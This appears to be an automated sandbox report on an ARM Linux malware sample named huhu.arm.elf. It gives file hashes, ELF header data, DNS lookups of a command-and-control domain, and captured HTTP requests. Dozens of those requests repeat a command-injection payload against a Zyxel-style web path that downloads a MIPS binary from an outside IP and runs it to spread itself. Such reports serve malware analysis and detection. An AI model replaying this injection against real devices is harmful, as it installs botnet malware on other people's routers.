                                              Encrypted:false
                                              SSDEEP:3:TgCJ2s5:TgCJ2s5
                                              MD5:2BAA97F247B0570A2288E157BB5A3B7C
                                              SHA1:FC3592516427A3437766773CACE9AC8746C00D8C
                                              SHA-256:F1EBD7403C4AEC3DBF36C751534ED2831B73514F959FF06FCBB0C413F3FA4952
                                              SHA-512:84FD0B9948E9EFB5F602C307308BDF5B38A4FA9397FA1B75CE2320372319C9B8EDA1D11DB507FCF6E97E8EA3C792A560FE9D888C8994E12F5A02C8A3B3728432
                                              Malicious:false
                                              Preview:/tmp/huhu.arm.elf.
                                              Process:/tmp/huhu.arm.elf
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):18
                                              Entropy (8bit):3.614369445886757
                                              Encrypted:false
                                              SSDEEP:3:TgCJ2s5:TgCJ2s5
                                              MD5:2BAA97F247B0570A2288E157BB5A3B7C
                                              SHA1:FC3592516427A3437766773CACE9AC8746C00D8C
                                              SHA-256:F1EBD7403C4AEC3DBF36C751534ED2831B73514F959FF06FCBB0C413F3FA4952
                                              SHA-512:84FD0B9948E9EFB5F602C307308BDF5B38A4FA9397FA1B75CE2320372319C9B8EDA1D11DB507FCF6E97E8EA3C792A560FE9D888C8994E12F5A02C8A3B3728432
                                              Malicious:false
                                              Preview:/tmp/huhu.arm.elf.
                                              Process:/tmp/huhu.arm.elf
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):18
                                              Entropy (8bit):3.614369445886757
                                              Encrypted:false
                                              SSDEEP:3:TgCJ2s5:TgCJ2s5
                                              MD5:2BAA97F247B0570A2288E157BB5A3B7C
                                              SHA1:FC3592516427A3437766773CACE9AC8746C00D8C
                                              SHA-256:F1EBD7403C4AEC3DBF36C751534ED2831B73514F959FF06FCBB0C413F3FA4952
                                              SHA-512:84FD0B9948E9EFB5F602C307308BDF5B38A4FA9397FA1B75CE2320372319C9B8EDA1D11DB507FCF6E97E8EA3C792A560FE9D888C8994E12F5A02C8A3B3728432
                                              Malicious:false
                                              Preview:/tmp/huhu.arm.elf.
                                              Process:/tmp/huhu.arm.elf
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):18
                                              Entropy (8bit):3.614369445886757
                                              Encrypted:false
                                              SSDEEP:3:TgCJ2s5:TgCJ2s5
                                              MD5:2BAA97F247B0570A2288E157BB5A3B7C
                                              SHA1:FC3592516427A3437766773CACE9AC8746C00D8C
                                              SHA-256:F1EBD7403C4AEC3DBF36C751534ED2831B73514F959FF06FCBB0C413F3FA4952
                                              SHA-512:84FD0B9948E9EFB5F602C307308BDF5B38A4FA9397FA1B75CE2320372319C9B8EDA1D11DB507FCF6E97E8EA3C792A560FE9D888C8994E12F5A02C8A3B3728432
                                              Malicious:false
                                              Preview:/tmp/huhu.arm.elf.
                                              Process:/tmp/huhu.arm.elf
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):18
                                              Entropy (8bit):3.614369445886757
                                              Encrypted:false
                                              SSDEEP:3:TgCJ2s5:TgCJ2s5
                                              MD5:2BAA97F247B0570A2288E157BB5A3B7C
                                              SHA1:FC3592516427A3437766773CACE9AC8746C00D8C
                                              SHA-256:F1EBD7403C4AEC3DBF36C751534ED2831B73514F959FF06FCBB0C413F3FA4952
                                              SHA-512:84FD0B9948E9EFB5F602C307308BDF5B38A4FA9397FA1B75CE2320372319C9B8EDA1D11DB507FCF6E97E8EA3C792A560FE9D888C8994E12F5A02C8A3B3728432
                                              Malicious:false
                                              Preview:/tmp/huhu.arm.elf.
                                              Process:/tmp/huhu.arm.elf
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):18
                                              Entropy (8bit):3.614369445886757
                                              Encrypted:false
                                              SSDEEP:3:TgCJ2s5:TgCJ2s5
                                              MD5:2BAA97F247B0570A2288E157BB5A3B7C
                                              SHA1:FC3592516427A3437766773CACE9AC8746C00D8C
                                              SHA-256:F1EBD7403C4AEC3DBF36C751534ED2831B73514F959FF06FCBB0C413F3FA4952
                                              SHA-512:84FD0B9948E9EFB5F602C307308BDF5B38A4FA9397FA1B75CE2320372319C9B8EDA1D11DB507FCF6E97E8EA3C792A560FE9D888C8994E12F5A02C8A3B3728432
                                              Malicious:false
                                              Preview:/tmp/huhu.arm.elf.
                                              Process:/tmp/huhu.arm.elf
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):18
                                              Entropy (8bit):3.614369445886757
                                              Encrypted:false
                                              SSDEEP:3:TgCJ2s5:TgCJ2s5
                                              MD5:2BAA97F247B0570A2288E157BB5A3B7C
                                              SHA1:FC3592516427A3437766773CACE9AC8746C00D8C
                                              SHA-256:F1EBD7403C4AEC3DBF36C751534ED2831B73514F959FF06FCBB0C413F3FA4952
                                              SHA-512:84FD0B9948E9EFB5F602C307308BDF5B38A4FA9397FA1B75CE2320372319C9B8EDA1D11DB507FCF6E97E8EA3C792A560FE9D888C8994E12F5A02C8A3B3728432
                                              Malicious:false
                                              Preview:/tmp/huhu.arm.elf.
                                              File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                              Entropy (8bit):5.637396296619571
                                              TrID:
                                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                              File name:huhu.arm.elf
                                              File size:146'240 bytes
                                              MD5:bd0288bb7c4b34902c98b5b700ccdca1
                                              SHA1:5c98873909c1ce2dfddd59ced5b1ce1f4c26e403
                                              SHA256:f8001abcfa86a36ccf6e7d971183513f9226c8b5e19ed35d72242df08b337a91
                                              SHA512:a03a0273fdf949919b4b6f3a6e260f949e452c5f37ba34e917c9b1391ef9bf140268e29c6064e4105e44bebc5f00a7c8a106dc1a26447a6bc3f8065a8ac55888
                                              SSDEEP:3072:S0Wwjt3TFP+qMFage4CSh339IsnEnMNXJNxA:S0dp5KEh4CW339eMNXJNO
                                              TLSH:09E32945FC408B27C6D612BBFB5E428D372A17E8D2EE72039D216F64378A95B0E37542
                                              File Content Preview:.ELF...a..........(.........4....9......4. ...(.....................(...(...............,...,...,...DI..X...........Q.td..................................-...L."...kp..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                              ELF header

                                              Class:ELF32
                                              Data:2's complement, little endian
                                              Version:1 (current)
                                              Machine:ARM
                                              Version Number:0x1
                                              Type:EXEC (Executable file)
                                              OS/ABI:ARM - ABI
                                              ABI Version:0
                                              Entry Point Address:0x8190
                                              Flags:0x202
                                              ELF Header Size:52
                                              Program Header Offset:52
                                              Program Header Size:32
                                              Number of Program Headers:3
                                              Section Header Offset:145840
                                              Section Header Size:40
                                              Number of Section Headers:10
                                              Header String Table Index:9
                                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                              NULL0x00x00x00x00x0000
                                              .initPROGBITS0x80940x940x180x00x6AX004
                                              .textPROGBITS0x80b00xb00x1c1e40x00x6AX0016
                                              .finiPROGBITS0x242940x1c2940x140x00x6AX004
                                              .rodataPROGBITS0x242a80x1c2a80x2d800x00x2A004
                                              .ctorsPROGBITS0x2f02c0x1f02c0xc0x00x3WA004
                                              .dtorsPROGBITS0x2f0380x1f0380x80x00x3WA004
                                              .dataPROGBITS0x2f0600x1f0600x49100x00x3WA0032
                                              .bssNOBITS0x339700x239700x46140x00x3WA004
                                              .shstrtabSTRTAB0x00x239700x3e0x00x0001
                                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                              LOAD0x00x80000x80000x1f0280x1f0286.10880x5R E0x8000.init .text .fini .rodata
                                              LOAD0x1f02c0x2f02c0x2f02c0x49440x8f580.41200x6RW 0x8000.ctors .dtors .data .bss
                                              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jan 29, 2024 07:02:58.463232994 CET192.168.2.148.8.8.80xf565Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:02.972646952 CET192.168.2.148.8.8.80x526fStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:07.486924887 CET192.168.2.148.8.8.80xd442Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:12.237552881 CET192.168.2.148.8.8.80x4ca2Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:19.750320911 CET192.168.2.148.8.8.80x7Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:22.271862984 CET192.168.2.148.8.8.80xd459Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:26.786145926 CET192.168.2.148.8.8.80x67d5Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:28.289858103 CET192.168.2.148.8.8.80x785eStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:38.797188997 CET192.168.2.148.8.8.80x50a6Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:48.308743000 CET192.168.2.148.8.8.80xeb3Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:49.824312925 CET192.168.2.148.8.8.80x5d01Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:55.340359926 CET192.168.2.148.8.8.80xfcd0Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:57.854231119 CET192.168.2.148.8.8.80xe53dStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:04:01.364365101 CET192.168.2.148.8.8.80x2f9aStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:04:05.870630026 CET192.168.2.148.8.8.80xf37bStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:04:07.379298925 CET192.168.2.148.8.8.80x15bbStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:04:17.893429041 CET192.168.2.148.8.8.80x88d8Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:04:19.408442020 CET192.168.2.148.8.8.80xc992Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:04:24.921305895 CET192.168.2.148.8.8.80x5ee3Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:04:34.434545040 CET192.168.2.148.8.8.80xf640Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:04:39.946985960 CET192.168.2.148.8.8.80x7a14Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:04:50.466098070 CET192.168.2.148.8.8.80xd853Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:04:56.981621981 CET192.168.2.148.8.8.80x6fe9Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jan 29, 2024 07:02:58.565480947 CET8.8.8.8192.168.2.140xf565No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:03.075151920 CET8.8.8.8192.168.2.140x526fNo error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:07.827491045 CET8.8.8.8192.168.2.140xd442No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:12.339793921 CET8.8.8.8192.168.2.140x4ca2No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:19.852716923 CET8.8.8.8192.168.2.140x7No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:22.374135017 CET8.8.8.8192.168.2.140xd459No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:26.888530970 CET8.8.8.8192.168.2.140x67d5No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:28.392379045 CET8.8.8.8192.168.2.140x785eNo error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:38.899111032 CET8.8.8.8192.168.2.140x50a6No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:48.411147118 CET8.8.8.8192.168.2.140xeb3No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:49.927175045 CET8.8.8.8192.168.2.140x5d01No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:55.443391085 CET8.8.8.8192.168.2.140xfcd0No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:03:57.956552029 CET8.8.8.8192.168.2.140xe53dNo error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:04:01.466846943 CET8.8.8.8192.168.2.140x2f9aNo error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:04:05.972775936 CET8.8.8.8192.168.2.140xf37bNo error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:04:07.482119083 CET8.8.8.8192.168.2.140x15bbNo error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:04:17.996258020 CET8.8.8.8192.168.2.140x88d8No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:04:19.510610104 CET8.8.8.8192.168.2.140xc992No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:04:25.024226904 CET8.8.8.8192.168.2.140x5ee3No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:04:34.536570072 CET8.8.8.8192.168.2.140xf640No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:04:40.050052881 CET8.8.8.8192.168.2.140x7a14No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:04:50.568917990 CET8.8.8.8192.168.2.140xd853No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Jan 29, 2024 07:04:57.084569931 CET8.8.8.8192.168.2.140x6fe9No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                              Session IDSource IPSource PortDestination IPDestination Port
                                              0192.168.2.1448536132.14.130.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.493652105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1192.168.2.1451340193.49.129.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.493767977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2192.168.2.1442786108.11.138.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.493819952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3192.168.2.1445052220.118.176.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.493870020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4192.168.2.145276080.51.230.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.493901014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5192.168.2.1433858122.6.69.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.493943930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6192.168.2.144805073.123.130.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.493997097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7192.168.2.145472483.239.118.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.494026899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8192.168.2.1434558168.234.38.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.494069099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9192.168.2.143405482.149.217.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.494151115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10192.168.2.1434894206.11.12.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.494188070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11192.168.2.143653423.158.229.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.494225979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12192.168.2.144652892.107.179.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.494280100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13192.168.2.145259275.213.104.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.494287968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14192.168.2.1446636216.126.200.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.494322062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15192.168.2.1436056221.229.21.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.494379044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16192.168.2.14593224.5.28.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.494420052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17192.168.2.144217023.10.226.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.494471073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18192.168.2.143769481.87.157.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.494504929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19192.168.2.144142475.165.192.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.494533062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20192.168.2.1442524204.197.56.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.494575977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21192.168.2.1442162172.180.93.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.494605064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22192.168.2.14360901.106.203.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.494652987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23192.168.2.1449464202.238.127.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.494707108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24192.168.2.1435336176.232.98.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.494735003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25192.168.2.1454632137.91.187.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.494816065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26192.168.2.145741234.201.202.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.494822025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27192.168.2.1435370173.180.98.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.494904041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28192.168.2.14474268.82.165.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.495250940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29192.168.2.1448876172.84.214.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.495268106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              30192.168.2.143663434.10.91.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.495306015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              31192.168.2.143624234.149.200.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.495346069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
